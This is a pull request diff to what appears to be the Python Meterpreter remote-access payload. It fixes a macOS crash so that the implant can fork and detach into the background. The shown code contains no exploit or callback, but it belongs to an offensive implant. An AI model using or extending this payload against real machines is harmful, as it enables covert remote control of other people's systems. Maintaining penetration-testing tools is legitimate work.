### PR TITLE
fix crash on fork with OSX Python meterpreter using SystemConfiguration

### DIFF
--- a/data/meterpreter/meterpreter.py
+++ b/data/meterpreter/meterpreter.py
@@ -22,6 +22,7 @@ else:
 # this MUST be imported for urllib to work on OSX
 try:
 	import SystemConfiguration as osxsc
+	osxsc.SCNetworkInterfaceCopyAll()
 	has_osxsc = True
 except ImportError:
 	has_osxsc = False
@@ -749,7 +750,7 @@ class PythonMeterpreter(object):
 		resp = struct.pack('>I', len(resp) + 4) + resp
 		return resp
 
-if not hasattr(os, 'fork') or has_osxsc or (hasattr(os, 'fork') and os.fork() == 0):
+if not hasattr(os, 'fork') or (hasattr(os, 'fork') and os.fork() == 0):
 	if hasattr(os, 'setsid'):
 		try:
 			os.setsid()


### PR DESCRIPTION
Calling into SystemConfiguration before forking seems to allow the child process to use it without a null pointer dereference. This should fix #5013, and reverts the workaround in #5179 (the verification steps are the same).

There may be a way to make it work by doing less, but I have not fully explored the possibilities yet.
